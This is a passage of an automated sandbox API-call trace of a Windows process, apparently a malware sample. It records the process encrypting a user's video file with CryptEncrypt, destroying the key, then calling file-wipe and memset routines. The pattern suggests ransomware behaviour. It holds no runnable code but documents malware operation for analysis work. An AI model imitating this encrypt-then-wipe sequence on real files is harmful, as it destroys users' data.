(HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0042.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0042.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0042.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0042.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0042.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0042.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0042.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0042.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0042.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0042.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0042.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0042.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0042.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0042.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0042.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0042.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0042.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0042.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0042.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0042.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0042.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0042.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0042.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0042.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0042.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0042.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0042.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0042.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11) returned 0x7ae928 [0042.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x7ae928, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0042.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0042.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0042.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0042.026] GetProcAddress (hModule=0x754b0000, lpProcName="CryptGetKeyParam") returned 0x754d77cb [0042.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0042.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0042.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0042.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0042.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0042.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0042.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0042.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0042.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0042.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0042.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0042.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0042.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0042.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0042.027] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da208, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da208*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0042.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0042.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0042.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0042.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0042.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0042.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0042.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0042.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0042.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0042.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0042.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0042.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0042.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0042.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0042.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0042.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0042.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0042.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0042.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0042.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0042.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0042.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0042.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0042.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0042.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0042.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0042.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0042.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0042.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0042.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0042.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0042.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0042.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0042.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0042.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0042.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0042.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0042.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0042.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0042.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0042.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0042.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0042.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0042.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0042.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0042.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0042.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0042.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0042.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0042.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0042.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0042.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0042.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0042.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0042.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0042.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0042.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0042.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0042.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0042.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0042.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0042.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0042.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0042.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0042.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0042.029] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0042.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0042.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb50 [0042.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0042.029] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0042.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c970 [0042.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0042.029] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0042.030] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0042.030] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.030] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x6757, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x6760) returned 1 [0042.030] CharLowerBuffW (in: lpsz="byte[26465]", cchLength=0xb | out: lpsz="byte[26465]") returned 0xb [0042.031] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.032] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.032] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xad5638*, pdwDataLen=0x6ae220*=0x6757, dwBufLen=0x6760 | out: pbData=0xad5638*, pdwDataLen=0x6ae220*=0x6760) returned 1 [0042.034] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0042.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.034] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.036] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.042] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0042.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.042] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.042] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.042] CryptDestroyKey (hKey=0x7c2200) returned 1 [0042.042] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0042.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.042] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.043] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.043] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0042.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.043] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.043] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0042.043] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0042.043] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0042.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0042.043] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.043] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0042.043] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.043] FreeLibrary (hLibModule=0x754b0000) returned 1 [0042.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0042.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0042.045] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0042.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0042.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.045] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1996c6b0, ftCreationTime.dwHighDateTime=0x1d5b9f7, ftLastAccessTime.dwLowDateTime=0x44757480, ftLastAccessTime.dwHighDateTime=0x1d5c4c4, ftLastWriteTime.dwLowDateTime=0x44757480, ftLastWriteTime.dwHighDateTime=0x1d5c4c4, nFileSizeHigh=0x0, nFileSizeLow=0x6757, dwReserved0=0x0, dwReserved1=0x777648, cFileName="-23ZP4gcOG gf3iWX.flv", cAlternateFileName="-23ZP4~1.FLV")) returned 0x7c2100 [0042.045] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0042.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0042.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0042.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0042.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.045] CharLowerBuffW (in: lpsz="byte[26455]", cchLength=0xb | out: lpsz="byte[26455]") returned 0xb [0042.045] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0042.045] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0042.045] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0042.046] FreeLibrary (hLibModule=0x76b40000) returned 1 [0042.046] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.046] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.046] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.046] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0042.046] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.046] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.046] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.046] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.046] PeekMessageW (in: lpMsg=0x6ae83c, 